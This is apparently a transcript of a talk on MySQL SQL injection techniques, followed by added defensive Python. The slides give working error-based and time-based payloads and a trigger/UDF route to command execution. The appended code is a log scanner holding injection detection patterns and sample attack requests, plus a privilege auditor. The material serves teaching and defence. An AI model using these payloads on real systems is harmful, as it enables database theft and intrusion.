Clever Tricks of SQL Injection (關於SQL Injection的那些奇技淫巧)
Transcript

  • 1. Clever Tricks of SQL Injection (關於SQL Injection的那些奇技淫巧), Orange@chroot.org
  • 2. SQL Injection?
  • 3. Havij, Pangolin, DSQL Tool, NBSI / HBSI, BSQL Hacker, Domain tools, SQLmap, etc.
  • 4. This talk is about MySQL!
  • 5. MySQL Injection (maybe you know). Get data: Blind Injection (true/false, time based, deep blind injection), Union Injection, Error Based Injection. Read / Write: LOAD_FILE, INTO OUTFILE. Others: information_schema, user-defined functions, triggers.
  • 6. MySQL Injection (maybe you know more). Get data: Blind Injection (true/false, time based, deep blind injection), Union Injection, Error Based Injection. Read / Write: LOAD_FILE, INTO OUTFILE. Others: information_schema, user-defined functions, triggers.
  • 7. MySQL development history (feature: MySQL series in which it appeared):
        Unions: 4.0
        Subqueries: 4.1
        R-trees: 4.1 (for the MyISAM storage engine)
        Stored procedures and functions: 5.0
        Views: 5.0
        Cursors: 5.0
        XA transactions: 5.0
        Triggers: 5.0 and 5.1
        Event scheduler: 5.1
        Partitioning: 5.1
        Pluggable storage engine API: 5.1
        Plugin API: 5.1
        InnoDB Plugin: 5.1
        Row-based replication: 5.1
        Server log tables: 5.1
  • 8. MySQL (1/3). Get data: Blind Injection (true/false, time based, deep blind injection), Union Injection, Error Based Injection. Read / Write: LOAD_FILE, INTO OUTFILE. Others: information_schema, user-defined functions, triggers.
  • 9. Error Based Injection: like error-based injection in SQL Server. When to use it? Insert injection; update injection; the same parameter is used in queries against several tables; the query's result is not displayed on the page. How to implement it? Duplicate error; function error.
  • 10. Select * from (Select 1,1) as x  =>  ERROR: Duplicate column name '1'
  • 11. Select * from (select * from user as a join user as b) as x  =>  ERROR: Duplicate column name 'Host'
  • 12. Select * from (select * from user as a join user as b using(Host)) as x  =>  ERROR: Duplicate column name 'User'
  • 13. Select * from (Select user(),user()) as x  =>  will this show the user name?
  • 14. No: ERROR: Duplicate column name 'user()'
  • 15. NAME_CONST(name, value): causes the column to have the given name.
  • 16. Select NAME_CONST('a',1), NAME_CONST('b',2)  =>  columns a and b, values 1 and 2
  • 17. Select * from (Select NAME_CONST(user(),1), NAME_CONST(user(),1)) as x
  • 18. MySQL patched it: in MySQL > 5.1, NAME_CONST() can no longer be used this way, because its argument must be a constant.
  • 19. select * from (select count(*), concat((select (select user()) from information_schema.tables limit 0,1), floor(rand(0)*2)) as x from information_schema.tables group by x) as a  =>  ERROR 1062 (23000): Duplicate entry 'root@localhost1' for key 1
  • 20. What is the Duplicate Entry error?
  • 21. SELECT * FROM (SELECT COUNT(*), CONCAT(USER(), FLOOR(RAND()*2)) FROM mysql.user GROUP BY 2) AS a  =>  ERROR 1062 (23000): Duplicate entry 'root@localhost1' for key 1
  • 22. Demo
  • 23. MySQL (2/3). Get data: Blind Injection (true/false, time based, deep blind injection), Union Injection, Error Based Injection. I/O: LOAD_FILE, INTO OUTFILE. Others: information_schema, user-defined functions, triggers.
  • 24. Deep Blind Injection: status 200 or 500? Time based: quick or slow? a -> 0x97: 9 -> delay 9 seconds, 7 -> delay 7 seconds. So one character can be recovered in two requests.
  • 25. Deep Blind Injection (T-SQL template):
        DECLARE @x as int;
        DECLARE @w as char(6);
        SET @x = ASCII(SUBSTRING(master.dbo.fn_varbintohexstr(CAST({QUERY} as varbinary(8000))), {POSITION}, 1));
        IF @x >= 97 SET @x = @x - 87 ELSE SET @x = @x - 48;
        SET @w = '0:0:' + CAST(@x * {SECONDS} as char);
        WAITFOR DELAY @w
  • 26. Deep Blind Injection (MySQL):
        if( ord(substring(hex(user()),1,1)) >= 97,
            sleep(ord(substring(hex(user()),1,1)) - 87),
            sleep(ord(substring(hex(user()),1,1)) - 48) )
        Implemented by BSQL Hacker.
  • 27. MySQL (3/3). Get data: Blind Injection (true/false, time based, deep blind injection), Union Injection, Error Based Injection. Read / Write: LOAD_FILE, INTO OUTFILE. Others: information_schema, user-defined functions, triggers.
  • 28. MySQL Triggers: a trigger is a named database object that is associated with a table, and that activates when a particular event occurs for the table.
  • 29. When a trigger is created, MySQL/data/database/ contains table_name.TRG and atk.TRN. On update/delete/insert, MySQL checks the files above. Generate them yourself?
  • 30. How to exploit it: update / insert data? Add a MySQL account? Exploit it with a UDF? (Causes the MySQL server to stop; maybe a security feature, maybe a bug.) A SQL injection can run system commands!
  • 31. Demo
  • 32. Thanks : )
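The error-based payload shapes on slides 9 to 21 (NAME_CONST, and the COUNT(*) / FLOOR(RAND(0)*2) / GROUP BY duplicate-entry trick) and the timing payloads on slides 24 to 26 each leave two traces a defender can look for: the function names in the request, and either database error text or an unusually long response time in the reply. The following Python is an added example, not code from the slides or from BSQL Hacker. The log line format, the sample lines, the SLOW_MS threshold and the signature list are all constructed for this example rather than taken from any server default or product rule set.

```python
"""Scan web access logs for error-based and time-based SQL injection traces.

Added example (not from the slides). Every sample line below is constructed.
"""
import re
from dataclasses import dataclass
from urllib.parse import unquote_plus

# Constructed log format (not a real server default):
#   client_ip "METHOD target HTTP/x.y" status bytes response_ms "start of response body"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) "(?P<method>\S+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) (?P<bytes>\d+) (?P<ms>\d+) "(?P<body>.*)"$'
)

# Request-side signatures, matched against the URL-decoded target.
REQUEST_SIGNATURES = [
    ("error_based", re.compile(r"\bname_const\s*\(", re.I)),
    ("error_based", re.compile(r"\bfloor\s*\(\s*rand\s*\(", re.I)),
    ("error_based", re.compile(r"count\s*\(\s*\*\s*\).*\bgroup\s+by\b", re.I | re.S)),
    ("time_based", re.compile(r"\bsleep\s*\(", re.I)),
    ("time_based", re.compile(r"\bbenchmark\s*\(", re.I)),
    ("time_based", re.compile(r"\bwaitfor\s+delay\b", re.I)),
]

# Response-side signatures: MySQL error text that should never reach a client.
LEAK_SIGNATURES = [
    ("db_error_leak", re.compile(r"Duplicate (entry|column name)", re.I)),
    ("db_error_leak", re.compile(r"ERROR \d{4} \(\d{5}\)")),
    ("db_error_leak", re.compile(r"You have an error in your SQL syntax", re.I)),
]

# Constructed threshold: a response this slow, after a request that carries a
# delay function, means the delay executed instead of being rejected.
SLOW_MS = 3000

SAMPLE_LOG = [
    '10.0.0.5 "GET /item.php?id=12 HTTP/1.1" 200 4321 18 "<html>Item 12</html>"',
    '10.0.0.7 "GET /item.php?id=1%27%20and%20(select%201%20from%20(select%20name_const(user(),1),name_const(user(),1))x) HTTP/1.1" 500 210 21 "Duplicate column name \'root@localhost\'"',
    '10.0.0.7 "GET /item.php?id=1%20and%20(select%201%20from%20(select%20count(*),concat(user(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 500 240 23 "ERROR 1062 (23000): Duplicate entry \'root@localhost1\' for key 1"',
    '10.0.0.7 "GET /item.php?id=1%20and%20sleep(9) HTTP/1.1" 200 4321 9020 "<html>Item 1</html>"',
    '10.0.0.9 "GET /item.php?id=1%20and%20sleep(9) HTTP/1.1" 403 150 2 "Forbidden"',
    '10.0.0.5 "GET /search.php?q=sleep+mask HTTP/1.1" 200 5120 30 "<html>Results</html>"',
]


@dataclass
class Finding:
    ip: str
    target: str        # URL-decoded request target
    status: int
    ms: int
    categories: tuple  # sorted, de-duplicated category names


def analyse_line(line):
    """Return a Finding for one log line, or None when nothing suspicious is present."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = unquote_plus(m["target"])
    cats = {cat for cat, rx in REQUEST_SIGNATURES if rx.search(decoded)}
    cats |= {cat for cat, rx in LEAK_SIGNATURES if rx.search(m["body"])}
    ms = int(m["ms"])
    # A delay function in the request plus a slow reply: the delay really ran.
    if "time_based" in cats and ms >= SLOW_MS:
        cats.add("confirmed_delay")
    if not cats:
        return None
    return Finding(m["ip"], decoded, int(m["status"]), ms, tuple(sorted(cats)))


def scan_log(lines):
    return [f for f in map(analyse_line, lines) if f is not None]


def summarize(findings):
    """Count findings per category, e.g. to feed a dashboard or alert threshold."""
    counts = {}
    for f in findings:
        for c in f.categories:
            counts[c] = counts.get(c, 0) + 1
    return counts


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f.ip, f.status, f.ms, "ms", f.categories, f.target)
    print(summarize(scan_log(SAMPLE_LOG)))
```

The last sample line ("sleep mask" as an ordinary search term) is there on purpose: anchoring the delay signatures on the opening parenthesis keeps plain words out of the alert stream. The response-side check is the one that matters most for the error-based slides, since the whole technique only works when the database error text is echoed back to the client; a "db_error_leak" hit with no request-side match is still worth fixing.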
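The trigger technique on slides 28 to 30, like the LOAD_FILE / INTO OUTFILE items in the agenda, depends on the account behind the injected query being able to read and write files on the server, which in MySQL needs the global FILE privilege and an unrestricted secure_file_priv. The following Python is an added example, not from the slides: it parses constructed SHOW GRANTS output and a constructed @@secure_file_priv value and reports the accounts and settings that leave that path open. Account names, hosts and grant lines are made up for the example.

```python
"""Audit MySQL grants and secure_file_priv for file read/write exposure.

Added example (not from the slides). SAMPLE_GRANTS is constructed.
"""
import re

# Shape of one SHOW GRANTS line, e.g.  GRANT SELECT, FILE ON *.* TO 'report'@'%'
GRANT_RE = re.compile(
    r"^GRANT (?P<privs>.+?) ON (?P<scope>\S+) TO '(?P<user>[^']*)'@'(?P<host>[^']*)'",
    re.I,
)

# FILE is a global privilege; ALL [PRIVILEGES] on *.* includes it.
FILE_CAPABLE = {"FILE", "ALL", "ALL PRIVILEGES"}

# Constructed SHOW GRANTS output for several made-up accounts.
SAMPLE_GRANTS = [
    "GRANT USAGE ON *.* TO 'app'@'10.0.0.%'",
    "GRANT SELECT, INSERT, UPDATE, DELETE ON `shop`.* TO 'app'@'10.0.0.%'",
    "GRANT SELECT, FILE ON *.* TO 'report'@'%'",
    "GRANT ALL PRIVILEGES ON *.* TO 'legacy'@'%' WITH GRANT OPTION",
    "GRANT SELECT ON `shop`.* TO 'ro'@'localhost'",
]


def parse_grants(lines):
    """Map 'user@host' -> list of (scope, set of upper-cased privilege names)."""
    accounts = {}
    for line in lines:
        m = GRANT_RE.match(line.strip().rstrip(";"))
        if not m:
            continue
        account = f"{m['user']}@{m['host']}"
        privs = {p.strip().upper() for p in m["privs"].split(",")}
        scope = m["scope"].replace("`", "")
        accounts.setdefault(account, []).append((scope, privs))
    return accounts


def file_io_accounts(lines):
    """Accounts that can call LOAD_FILE() or SELECT ... INTO OUTFILE."""
    hits = []
    for account, grants in parse_grants(lines).items():
        if any(scope == "*.*" and privs & FILE_CAPABLE for scope, privs in grants):
            hits.append(account)
    return sorted(hits)


def secure_file_priv_issue(value):
    """value is what SELECT @@secure_file_priv returns: None for NULL, '' when
    unrestricted, or a directory path that confines file import/export."""
    if value is None:
        return None  # server-side file import/export is disabled entirely
    if value == "":
        return ("secure_file_priv is empty: INTO OUTFILE may write to any path the "
                "server process can reach, including the data directory that holds "
                "trigger .TRG/.TRN files")
    return None  # confined to one directory; check that it lies outside datadir


def audit(grant_lines, secure_file_priv):
    """Return one human-readable finding per risky account or setting."""
    findings = [
        f"{account}: FILE privilege on *.* "
        "(LOAD_FILE / INTO OUTFILE reachable through an injected query)"
        for account in file_io_accounts(grant_lines)
    ]
    issue = secure_file_priv_issue(secure_file_priv)
    if issue:
        findings.append(issue)
    return findings


if __name__ == "__main__":
    for line in audit(SAMPLE_GRANTS, ""):
        print(line)
```

The application account in the sample ('app'@'10.0.0.%') holds only table-level DML on its own schema and so produces no finding; that is the shape an injection-exposed account should have. The two flagged accounts are the ones through which the file-based slides become reachable, and the secure_file_priv check is the server-side setting that decides whether such a write can land in the data directory at all.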